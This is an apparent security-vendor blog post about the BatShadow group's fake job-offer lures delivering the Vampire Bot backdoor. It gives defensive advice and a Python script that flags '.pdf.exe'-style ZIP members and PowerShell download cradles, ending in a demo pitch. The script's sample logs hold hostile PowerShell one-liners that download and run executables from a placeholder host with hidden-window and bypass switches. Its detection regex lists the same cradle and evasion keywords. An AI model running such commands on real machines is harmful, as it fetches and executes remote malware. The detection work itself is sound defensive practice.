In a sinister twist that targets job seekers rather than corporate servers, the Vietnamese threat group BatShadow has launched a new campaign that uses fake job descriptions and recruitment lures to deliver a Go-based backdoor called Vampire Bot.
The attack chain is simple and chilling: an email arrives from what appears to be a recruiter, with a ZIP attachment claiming to hold a job description or marketing brief. Inside is a decoy PDF alongside a malicious file that passes for a document, either an executable with a double extension such as ".pdf.exe" or a shortcut (.lnk) file. Launching it runs a PowerShell script that downloads the Go-compiled payload.
Once running, Vampire Bot profiles the host's hardware and software, takes screenshots at intervals, harvests credentials, and communicates with its command-and-control (C2) server over encrypted channels. This isn't commodity malware: it is built to blend into normal traffic and to persist.
What makes this especially dangerous for firms like yours: the campaign targets job seekers and digital marketing professionals, exactly the people who sit outside the controls most organizations lock down hardest. If a freelancer or new hire opens that lure while connected to your network, you could be looking at initial access you never detected.
Here’s what to do:
- Treat unsolicited job-offer attachments as high risk.
- Block executables and shortcut files arriving in email attachments (including inside ZIPs), restrict PowerShell with script-block logging and a constrained execution policy, and monitor for unusual PowerShell commands, especially ones launched from a user's Downloads folder or from a shortcut file.
- Use endpoint detection to hunt for persistence artifacts such as scheduled tasks or services (for example one named "svcbot") dropped by this malware.
- Extend awareness training beyond current employees – to candidates, contractors, and third-party vendors.
- Use platforms like AUMINT.io to simulate these recruitment-style lures and track how your humans respond.
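Two of the checks above (the disguised ".pdf.exe" attachment and the PowerShell download stage) are mechanical enough to script. The following is an added example written for this page, not AUMINT.io's tooling or anything taken from the campaign itself: it inspects an in-memory ZIP for document-looking names whose final extension is executable, and runs a small process-creation hunt over constructed log lines. Every filename, host (`lure.invalid`) and log line is made up for the example; the `Id=|Image=|ParentImage=|CommandLine=` record format is an assumed flat form of what a Sysmon Event ID 1 or EDR record would carry.

```python
"""Two lightweight checks for the BatShadow-style lure described above.
Added example for this page, not AUMINT.io's or the malware authors' code.
All filenames, hosts and log lines below are constructed for illustration."""
import io
import re
import zipfile

# Document-like extensions an attacker hides behind, and the extensions
# Windows actually executes. Only the LAST extension decides what runs.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
EXEC_EXTS = {"exe", "lnk", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "hta", "ps1", "msi"}

# Switches and cmdlets typical of a PowerShell download cradle.
CRADLE = re.compile(
    r"(invoke-webrequest|iwr\b|downloadstring|downloadfile|start-bitstransfer"
    r"|-enc(odedcommand)?\b|frombase64string|-w(indowstyle)?\s+hidden|bypass)",
    re.I,
)


def is_disguised_executable(path: str) -> bool:
    """True for names like 'Job_Description.pdf.exe' or 'Brief.pdf.lnk'."""
    parts = re.split(r"[\\/]", path)[-1].lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXEC_EXTS and parts[-2] in DOC_EXTS


def build_sample_lure() -> bytes:
    """Constructed stand-in for the recruiter's ZIP: decoy PDF plus payloads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Job_Description_Marketing_Lead.pdf", b"%PDF-1.4 decoy only")
        z.writestr("Job_Description_Marketing_Lead.pdf.exe", b"MZ constructed stub")
        z.writestr("Company_Brief.pdf.lnk", b"L\x00\x00\x00 constructed stub")
    return buf.getvalue()


def suspicious_members(zip_bytes: bytes) -> list[str]:
    """Archive members that pretend to be documents but would execute."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        return [n for n in z.namelist() if is_disguised_executable(n)]


# Constructed process-creation events in a flat key=value form (assumed
# layout; a Sysmon Event ID 1 or EDR record carries the same fields).
SAMPLE_EVENTS = [
    r"Id=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=powershell.exe -File C:\scripts\nightly_backup.ps1",
    r"Id=2|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Users\dana\Downloads\Job_Description_Marketing_Lead.pdf.exe"
    r"|CommandLine=powershell.exe -w hidden -ep bypass -c iwr http://lure.invalid/u -OutFile $env:TEMP\svc.exe; Start-Process $env:TEMP\svc.exe",
    r"Id=3|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=powershell.exe -NoP -W Hidden -Exec Bypass -Command Invoke-WebRequest http://lure.invalid/b -OutFile $env:TEMP\b.exe",
    r"Id=4|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=cmd.exe /c dir",
]


def parse_event(line: str) -> dict[str, str]:
    """Split one flat record into its fields."""
    return dict(field.split("=", 1) for field in line.split("|"))


def flag_event(event: dict[str, str]) -> list[str]:
    """Reasons this event looks like the lure's PowerShell stage, if any."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return []
    reasons = []
    # A .lnk is launched by explorer.exe, so the parent alone is not enough;
    # the cradle check below catches that variant.
    if is_disguised_executable(event.get("ParentImage", "")):
        reasons.append("powershell spawned by a disguised executable")
    if CRADLE.search(event.get("CommandLine", "")):
        reasons.append("download cradle or evasion switches")
    return reasons


def hunt(lines: list[str]) -> list[tuple[str, list[str]]]:
    """(event id, reasons) for every event worth an analyst's look."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = flag_event(event)
        if reasons:
            hits.append((event["Id"], reasons))
    return hits


if __name__ == "__main__":
    print("Disguised members:", suspicious_members(build_sample_lure()))
    for event_id, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(reasons)}")
```

The double-extension check deliberately flags only names that imitate a document; a plain `setup.exe` in a recruiter's ZIP is caught by the attachment policy, not by this function. On the log side, event 2 trips both signals (parent is the `.pdf.exe`, command line carries `-w hidden`, `bypass` and `iwr`), while event 3, the shortcut variant, has explorer.exe as its parent and is caught only by the cradle pattern, which is why monitoring PowerShell command lines matters as much as monitoring parent processes.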
At AUMINT.io we help you build human cyber-resilience by simulating exactly this kind of attack vector and showing you where your weakest links are before adversaries exploit them. Protect your organization by closing the gap between hacker strategy and your human practice.
Schedule your personalised demo now and start uncovering hidden risk pathways – Book a Demo